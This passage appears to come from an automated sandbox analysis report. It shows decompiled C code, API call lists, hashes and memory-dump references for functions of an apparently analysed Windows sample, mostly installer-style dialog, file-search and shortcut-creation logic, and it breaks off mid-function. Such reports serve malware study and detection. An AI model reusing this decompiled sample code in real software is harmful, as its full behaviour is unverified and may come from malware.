                                                                          • Opcode Fuzzy Hash: fa85b854a19c834815a7f5dd914cc43de4103a60353febe687952c11a8408a20
                                                                          • Instruction Fuzzy Hash: 0D819BB1900218BBDB11AFA1DC45BAF7BB8EF84314F00417AFA04B62D1D77C9A418B69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004020A6, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132comCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 74%
                                                                          			E004020A6(void* __eflags) {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E00402A9A(0xfffffff0);
				_t96 = E00402A9A(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x2c)) = E00402A9A(2);
				 *((intOrPtr*)(_t100 - 0x34)) = E00402A9A(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x44)) = E00402A9A(0x45);
				if(E00405538(_t96) == 0) {
					E00402A9A(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407324, _t75, 1, 0x407314, _t44);
				if(_t44 < _t75) {
					L12:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407334, _t100 - 8);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\hardz\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0x34)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0x34)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
						if(_t95 >= _t75) {
							 *0x409418 = _t75;
							MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409418, 0x400);
							_t69 =  *((intOrPtr*)(_t100 - 8));
							_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409418, 1);
						}
						_t66 =  *((intOrPtr*)(_t100 - 8));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L12;
					}
				}
				E00401428();
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                                                                          0x004020af
                                                                          0x004020b9
                                                                          0x004020c2
                                                                          0x004020cc
                                                                          0x004020d5
                                                                          0x004020df
                                                                          0x004020e3
                                                                          0x004020e3
                                                                          0x004020e8
                                                                          0x004020f9
                                                                          0x00402101
                                                                          0x004021df
                                                                          0x004021df
                                                                          0x004021e6
                                                                          0x00402107
                                                                          0x00402107
                                                                          0x00402118
                                                                          0x0040211c
                                                                          0x00402122
                                                                          0x0040212c
                                                                          0x0040212e
                                                                          0x00402139
                                                                          0x0040213c
                                                                          0x00402149
                                                                          0x0040214b
                                                                          0x0040214d
                                                                          0x00402154
                                                                          0x00402157
                                                                          0x00402157
                                                                          0x0040215a
                                                                          0x00402164
                                                                          0x0040216c
                                                                          0x00402171
                                                                          0x0040217d
                                                                          0x0040217d
                                                                          0x00402180
                                                                          0x00402189
                                                                          0x0040218c
                                                                          0x00402195
                                                                          0x0040219a
                                                                          0x004021ac
                                                                          0x004021b5
                                                                          0x004021bb
                                                                          0x004021c7
                                                                          0x004021c7
                                                                          0x004021c9
                                                                          0x004021cf
                                                                          0x004021cf
                                                                          0x004021d2
                                                                          0x004021d8
                                                                          0x004021dd
                                                                          0x004021f2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004021dd
                                                                          0x004021e8
                                                                          0x00402932
                                                                          0x0040293e

                                                                          APIs
                                                                          • CoCreateInstance.OLE32(00407324,?,00000001,00407314,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020F9
                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409418,00000400,?,00000001,00407314,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021B5
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp, xrefs: 00402131
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: ByteCharCreateInstanceMultiWide
                                                                          • String ID: C:\Users\user\AppData\Local\Temp
                                                                          • API String ID: 123533781-501415292
                                                                          • Opcode ID: 751c6343f30b53ff87cb2a36cb9a8fc5fe581f53ea8e30dae2934d6634253110
                                                                          • Instruction ID: 6da020dad1963d07c1d5d6cba7c730fbb78a3e39a4a6f028781d9f3b25516250
                                                                          • Opcode Fuzzy Hash: 751c6343f30b53ff87cb2a36cb9a8fc5fe581f53ea8e30dae2934d6634253110
                                                                          • Instruction Fuzzy Hash: 0D417D75A00215BFCB00DFA8CD88E9E7BB6FF89315B20416AF905EB2D1CA759D41CB64
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004026BC, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 39%
                                                                          			E004026BC(char __ebx, CHAR* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402A9A(2), _t19 - 0x1a4) != 0xffffffff) {
					E0040591D(__edi, _t6);
					_push(_t19 - 0x178);
					_push(__esi);
					E004059BF();
				} else {
					 *((char*)(__edi)) = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                                                          0x004026d4
                                                                          0x004026e8
                                                                          0x004026f3
                                                                          0x004026f4
                                                                          0x00402855
                                                                          0x004026d6
                                                                          0x004026d6
                                                                          0x004026d8
                                                                          0x004026da
                                                                          0x004026da
                                                                          0x00402932
                                                                          0x0040293e

                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004026CB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: FileFindFirst
                                                                          • String ID:
                                                                          • API String ID: 1974802433-0
                                                                          • Opcode ID: 9223db83c99603c3289ccd37b6b2a6db7d53f2a3e2294c42d49ba21f7ea334b2
                                                                          • Instruction ID: fa0b3d5524a7ec5f3b356c4eb27d29c110ff1bfb4a1b37a6377ddf9626cce4e3
                                                                          • Opcode Fuzzy Hash: 9223db83c99603c3289ccd37b6b2a6db7d53f2a3e2294c42d49ba21f7ea334b2
                                                                          • Instruction Fuzzy Hash: EBF0A0B2608110DBE701EBA49E49AEEB768DF52324F60417BE141B20C1D6B84A44DA2A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02671886, Relevance: .0, Instructions: 33COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219792320.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
                                                                          • Instruction ID: 3db6d43e7298555dcf4dff8a2b3941d8b970aa0790ce639d0d6929768a694480
                                                                          • Opcode Fuzzy Hash: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
                                                                          • Instruction Fuzzy Hash: F5014C78A10208EFCB51DF98D580A9DBBF5EB09220B1085D6E818E7311E330AE509B40
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0267166E, Relevance: .0, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219792320.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                                          • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
                                                                          • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                                          • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004038BF, Relevance: 46.8, APIs: 31, Instructions: 347windowstringCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 77%
                                                                          			E004038BF(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				signed int _t35;
				struct HWND__* _t37;
				struct HWND__* _t47;
				struct HWND__* _t65;
				struct HWND__* _t71;
				struct HWND__* _t84;
				struct HWND__* _t89;
				struct HWND__* _t97;
				int _t101;
				int _t104;
				struct HWND__* _t117;
				struct HWND__* _t120;
				signed int _t122;
				struct HWND__* _t127;
				long _t132;
				int _t134;
				int _t135;
				struct HWND__* _t136;
				void* _t139;

				_t135 = _a8;
				if(_t135 == 0x110 || _t135 == 0x408) {
					_t33 = _a12;
					_t117 = _a4;
					__eflags = _t135 - 0x110;
					 *0x79f56c = _t33;
					if(_t135 == 0x110) {
						 *0x7a2f84 = _t117;
						 *0x79f57c = GetDlgItem(_t117, 1);
						_t89 = GetDlgItem(_t117, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x79e548 = _t89;
						E00403DA7(_t117);
						SetClassLongA(_t117, 0xfffffff2,  *0x7a2768);
						 *0x7a274c = E00401410(4);
						_t33 = 1;
						__eflags = 1;
						 *0x79f56c = 1;
					}
					_t120 =  *0x409284; // 0xffffffff
					_t132 = (_t120 << 6) +  *0x7a2fa0;
					__eflags = _t120;
					if(_t120 < 0) {
						L38:
						E00403DF3(0x40b);
						while(1) {
							_t35 =  *0x79f56c;
							 *0x409284 =  *0x409284 + _t35;
							_t132 = _t132 + (_t35 << 6);
							_t37 =  *0x409284; // 0xffffffff
							__eflags = _t37 -  *0x7a2fa4;
							if(_t37 ==  *0x7a2fa4) {
								E00401410(1);
							}
							__eflags =  *0x7a274c;
							if( *0x7a274c != 0) {
								break;
							}
							__eflags =  *0x409284 -  *0x7a2fa4; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_push( *((intOrPtr*)(_t132 + 0x24)));
							_t122 =  *(_t132 + 0x14);
							_push(0x7ab000);
							E004059E1(_t117, _t122, _t132);
							_push( *((intOrPtr*)(_t132 + 0x20)));
							_push(0xfffffc19);
							E00403DA7(_t117);
							_push( *((intOrPtr*)(_t132 + 0x1c)));
							_push(0xfffffc1b);
							E00403DA7(_t117);
							_push( *((intOrPtr*)(_t132 + 0x28)));
							_push(0xfffffc1a);
							E00403DA7(_t117);
							_t47 = GetDlgItem(_t117, 3);
							__eflags =  *0x7a300c;
							_t136 = _t47;
							if( *0x7a300c != 0) {
								_t122 = _t122 & 0x0000fefd | 0x00000004;
								__eflags = _t122;
							}
							ShowWindow(_t136, _t122 & 0x00000008);
							EnableWindow(_t136, _t122 & 0x00000100);
							E00403DC9(_t122 & 0x00000002);
							EnableWindow( *0x79e548, _t122 & 0x00000004);
							SendMessageA(_t136, 0xf4, 0, 1);
							__eflags =  *0x7a300c;
							if( *0x7a300c == 0) {
								_push( *0x79f57c);
							} else {
								SendMessageA(_t117, 0x401, 2, 0);
								_push( *0x79e548);
							}
							E00403DDC();
							E004059BF(0x79f580, 0x7a2780);
							_push( *((intOrPtr*)(_t132 + 0x18)));
							_push( &(0x79f580[lstrlenA(0x79f580)]));
							E004059E1(_t117, 0, _t132);
							SetWindowTextA(_t117, 0x79f580);
							_push(0);
							_t65 = E0040136D( *((intOrPtr*)(_t132 + 8)));
							__eflags = _t65;
							if(_t65 != 0) {
								continue;
							} else {
								__eflags =  *_t132 - _t65;
								if( *_t132 == _t65) {
									continue;
								}
								__eflags =  *(_t132 + 4) - 5;
								if( *(_t132 + 4) != 5) {
									DestroyWindow( *0x7a2758);
									 *0x79ed58 = _t132;
									__eflags =  *_t132;
									if( *_t132 > 0) {
										_t71 = CreateDialogParamA( *0x7a2f80,  *_t132 +  *0x7a2760 & 0x0000ffff, _t117,  *(0x409288 +  *(_t132 + 4) * 4), _t132);
										__eflags = _t71;
										 *0x7a2758 = _t71;
										if(_t71 != 0) {
											_push( *((intOrPtr*)(_t132 + 0x2c)));
											_push(6);
											E00403DA7(_t71);
											GetWindowRect(GetDlgItem(_t117, 0x3fa), _t139 + 0x10);
											ScreenToClient(_t117, _t139 + 0x10);
											SetWindowPos( *0x7a2758, 0,  *(_t139 + 0x20),  *(_t139 + 0x20), 0, 0, 0x15);
											_push(0);
											E0040136D( *((intOrPtr*)(_t132 + 0xc)));
											ShowWindow( *0x7a2758, 8);
											E00403DF3(0x405);
										}
									}
									goto L58;
								}
								__eflags =  *0x7a300c - _t65;
								if( *0x7a300c != _t65) {
									goto L61;
								}
								__eflags =  *0x7a3000 - _t65;
								if( *0x7a3000 != _t65) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x7a2758);
						 *0x7a2f84 =  *0x7a2f84 & 0x00000000;
						__eflags =  *0x7a2f84;
						EndDialog(_t117,  *0x79e950);
						goto L58;
					} else {
						__eflags = _t33 - 1;
						if(_t33 != 1) {
							L37:
							__eflags =  *_t132;
							if( *_t132 == 0) {
								goto L61;
							}
							goto L38;
						}
						_push(0);
						_t84 = E0040136D( *((intOrPtr*)(_t132 + 0x10)));
						__eflags = _t84;
						if(_t84 == 0) {
							goto L37;
						}
						SendMessageA( *0x7a2758, 0x40f, 0, 1);
						__eflags =  *0x7a274c;
						return 0 |  *0x7a274c == 0x00000000;
					}
				} else {
					_t117 = _a4;
					if(_t135 == 0x47) {
						SetWindowPos( *0x79f560, _t117, 0, 0, 0, 0, 0x13);
					}
					if(_t135 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x79f560,  ~(_a12 - 1) & _t135);
					}
					if(_t135 != 0x40d) {
						__eflags = _t135 - 0x11;
						if(_t135 != 0x11) {
							__eflags = _t135 - 0x10;
							if(_t135 != 0x10) {
								L14:
								__eflags = _t135 - 0x111;
								if(_t135 != 0x111) {
									L30:
									return E00403E0E(_t135, _a12, _a16);
								}
								_t134 = _a12 & 0x0000ffff;
								_t127 = GetDlgItem(_t117, _t134);
								__eflags = _t127;
								if(_t127 == 0) {
									L17:
									__eflags = _t134 - 1;
									if(_t134 != 1) {
										__eflags = _t134 - 3;
										if(_t134 != 3) {
											__eflags = _t134 - 2;
											if(_t134 != 2) {
												L29:
												SendMessageA( *0x7a2758, 0x111, _a12, _a16);
												goto L30;
											}
											__eflags =  *0x7a300c;
											if( *0x7a300c == 0) {
												_t97 = E00401410(3);
												__eflags = _t97;
												if(_t97 != 0) {
													goto L30;
												}
												 *0x79e950 = 1;
												L25:
												_push(0x78);
												L26:
												E00403D80();
												goto L30;
											}
											E00401410(_t134);
											 *0x79e950 = _t134;
											goto L25;
										}
										__eflags =  *0x409284;
										if( *0x409284 <= 0) {
											goto L29;
										}
										_push(0xffffffff);
										goto L26;
									}
									_push(1);
									goto L26;
								}
								SendMessageA(_t127, 0xf3, 0, 0);
								_t101 = IsWindowEnabled(_t127);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L61;
								}
								goto L17;
							}
							__eflags =  *0x409284 -  *0x7a2fa4 - 1; // 0xffffffff
							if(__eflags != 0) {
								goto L30;
							}
							_t104 = IsWindowEnabled( *0x79e548);
							__eflags = _t104;
							if(_t104 != 0) {
								goto L30;
							}
							_t135 = 0x111;
							_a12 = 1;
							goto L14;
						}
						SetWindowLongA(_t117, 0, 0);
						return 1;
					} else {
						DestroyWindow( *0x7a2758);
						 *0x7a2758 = _a12;
						L58:
						if( *0x7a0580 == 0 &&  *0x7a2758 != 0) {
							ShowWindow(_t117, 0xa);
							 *0x7a0580 = 1;
						}
						L61:
						return 0;
					}
				}
			}




























                                                                          0x004038c9
                                                                          0x004038d1
                                                                          0x00403a4a
                                                                          0x00403a4e
                                                                          0x00403a52
                                                                          0x00403a54
                                                                          0x00403a59
                                                                          0x00403a64
                                                                          0x00403a6f
                                                                          0x00403a74
                                                                          0x00403a76
                                                                          0x00403a78
                                                                          0x00403a7b
                                                                          0x00403a80
                                                                          0x00403a8e
                                                                          0x00403a9b
                                                                          0x00403aa2
                                                                          0x00403aa2
                                                                          0x00403aa3
                                                                          0x00403aa3
                                                                          0x00403aa8
                                                                          0x00403ab5
                                                                          0x00403abb
                                                                          0x00403abd
                                                                          0x00403afd
                                                                          0x00403b02
                                                                          0x00403b07
                                                                          0x00403b07
                                                                          0x00403b0c
                                                                          0x00403b15
                                                                          0x00403b17
                                                                          0x00403b1c
                                                                          0x00403b22
                                                                          0x00403b26
                                                                          0x00403b26
                                                                          0x00403b2b
                                                                          0x00403b32
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403b3d
                                                                          0x00403b43
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403b49
                                                                          0x00403b4c
                                                                          0x00403b4f
                                                                          0x00403b54
                                                                          0x00403b59
                                                                          0x00403b5c
                                                                          0x00403b62
                                                                          0x00403b67
                                                                          0x00403b6a
                                                                          0x00403b70
                                                                          0x00403b75
                                                                          0x00403b78
                                                                          0x00403b7e
                                                                          0x00403b86
                                                                          0x00403b8c
                                                                          0x00403b93
                                                                          0x00403b95
                                                                          0x00403b9c
                                                                          0x00403b9c
                                                                          0x00403b9c
                                                                          0x00403ba6
                                                                          0x00403bb5
                                                                          0x00403bc1
                                                                          0x00403bd0
                                                                          0x00403be7
                                                                          0x00403be9
                                                                          0x00403bef
                                                                          0x00403c04
                                                                          0x00403bf1
                                                                          0x00403bfa
                                                                          0x00403bfc
                                                                          0x00403bfc
                                                                          0x00403c0a
                                                                          0x00403c1a
                                                                          0x00403c1f
                                                                          0x00403c2a
                                                                          0x00403c2b
                                                                          0x00403c32
                                                                          0x00403c38
                                                                          0x00403c3c
                                                                          0x00403c41
                                                                          0x00403c43
                                                                          0x00000000
                                                                          0x00403c49
                                                                          0x00403c49
                                                                          0x00403c4b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403c51
                                                                          0x00403c55
                                                                          0x00403c7a
                                                                          0x00403c80
                                                                          0x00403c86
                                                                          0x00403c89
                                                                          0x00403caf
                                                                          0x00403cb5
                                                                          0x00403cb7
                                                                          0x00403cbc
                                                                          0x00403cc2
                                                                          0x00403cc5
                                                                          0x00403cc8
                                                                          0x00403cdf
                                                                          0x00403ceb
                                                                          0x00403d06
                                                                          0x00403d0c
                                                                          0x00403d10
                                                                          0x00403d1d
                                                                          0x00403d28
                                                                          0x00403d28
                                                                          0x00403cbc
                                                                          0x00000000
                                                                          0x00403c89
                                                                          0x00403c57
                                                                          0x00403c5d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403c63
                                                                          0x00403c69
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403c6f
                                                                          0x00403c43
                                                                          0x00403d35
                                                                          0x00403d41
                                                                          0x00403d41
                                                                          0x00403d49
                                                                          0x00000000
                                                                          0x00403abf
                                                                          0x00403abf
                                                                          0x00403ac2
                                                                          0x00403af5
                                                                          0x00403af5
                                                                          0x00403af7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403af7
                                                                          0x00403ac4
                                                                          0x00403ac8
                                                                          0x00403acd
                                                                          0x00403acf
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403adf
                                                                          0x00403ae7
                                                                          0x00000000
                                                                          0x00403aed
                                                                          0x004038e3
                                                                          0x004038e3
                                                                          0x004038ea
                                                                          0x004038fb
                                                                          0x004038fb
                                                                          0x00403904
                                                                          0x0040390d
                                                                          0x00403918
                                                                          0x00403918
                                                                          0x00403924
                                                                          0x00403940
                                                                          0x00403943
                                                                          0x00403958
                                                                          0x0040395b
                                                                          0x00403990
                                                                          0x00403990
                                                                          0x00403996
                                                                          0x00403a37
                                                                          0x00000000
                                                                          0x00403a40
                                                                          0x0040399c
                                                                          0x004039af
                                                                          0x004039b1
                                                                          0x004039b3
                                                                          0x004039d0
                                                                          0x004039d3
                                                                          0x004039d5
                                                                          0x004039da
                                                                          0x004039dd
                                                                          0x004039ec
                                                                          0x004039ef
                                                                          0x00403a22
                                                                          0x00403a35
                                                                          0x00000000
                                                                          0x00403a35
                                                                          0x004039f1
                                                                          0x004039f8
                                                                          0x00403a11
                                                                          0x00403a16
                                                                          0x00403a18
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403a1a
                                                                          0x00403a06
                                                                          0x00403a06
                                                                          0x00403a08
                                                                          0x00403a08
                                                                          0x00000000
                                                                          0x00403a08
                                                                          0x004039fb
                                                                          0x00403a00
                                                                          0x00000000
                                                                          0x00403a00
                                                                          0x004039df
                                                                          0x004039e6
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004039e8
                                                                          0x00000000
                                                                          0x004039e8
                                                                          0x004039d7
                                                                          0x00000000
                                                                          0x004039d7
                                                                          0x004039bf
                                                                          0x004039c2
                                                                          0x004039c8
                                                                          0x004039ca
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004039ca
                                                                          0x00403963
                                                                          0x00403969
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403975
                                                                          0x0040397b
                                                                          0x0040397d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403983
                                                                          0x00403988
                                                                          0x00000000
                                                                          0x00403988
                                                                          0x0040394a
                                                                          0x00000000
                                                                          0x00403926
                                                                          0x0040392c
                                                                          0x00403936
                                                                          0x00403d4f
                                                                          0x00403d56
                                                                          0x00403d64
                                                                          0x00403d6a
                                                                          0x00403d6a
                                                                          0x00403d74
                                                                          0x00000000
                                                                          0x00403d74
                                                                          0x00403924

                                                                          APIs
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004038FB
                                                                          • ShowWindow.USER32(?), ref: 00403918
                                                                          • DestroyWindow.USER32 ref: 0040392C
                                                                          • SetWindowLongA.USER32 ref: 0040394A
                                                                          • IsWindowEnabled.USER32 ref: 00403975
                                                                          • GetDlgItem.USER32 ref: 004039A3
                                                                          • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 004039BF
                                                                          • IsWindowEnabled.USER32(00000000), ref: 004039C2
                                                                          • GetDlgItem.USER32 ref: 00403A6A
                                                                          • GetDlgItem.USER32 ref: 00403A74
                                                                          • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403A8E
                                                                          • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403ADF
                                                                          • GetDlgItem.USER32 ref: 00403B86
                                                                          • ShowWindow.USER32(00000000,?), ref: 00403BA6
                                                                          • EnableWindow.USER32(00000000,?), ref: 00403BB5
                                                                          • EnableWindow.USER32(?,?), ref: 00403BD0
                                                                          • SendMessageA.USER32(00000000,000000F4,00000000,00000001), ref: 00403BE7
                                                                          • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403BFA
                                                                          • lstrlenA.KERNEL32(0079F580,?,0079F580,007A2780), ref: 00403C23
                                                                          • SetWindowTextA.USER32(?,0079F580), ref: 00403C32
                                                                          • ShowWindow.USER32(?,0000000A), ref: 00403D64
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: Window$ItemMessageSend$Show$EnableEnabledLong$ClassDestroyTextlstrlen
                                                                          • String ID:
                                                                          • API String ID: 3950083612-0
                                                                          • Opcode ID: fa4e3fe4f8128de32ab5ebeb5ac9453328a33fd8f116c2f1de342d397e391704
                                                                          • Instruction ID: 5dd3c4f218cf3e404d6a97a2e5ce8d1cdd0b8388a563f9de6f37f2f8e87629b5
                                                                          • Opcode Fuzzy Hash: fa4e3fe4f8128de32ab5ebeb5ac9453328a33fd8f116c2f1de342d397e391704
                                                                          • Instruction Fuzzy Hash: 9DC1CC70904200AFD720AF25ED45E277FADEB89706F00453AF641B52F2D67DAA42CB1D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00403EEF, Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 204windowstringCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 92%
                                                                          			E00403EEF(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char* _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x79f568 =  *0x79f568 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403E0E(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
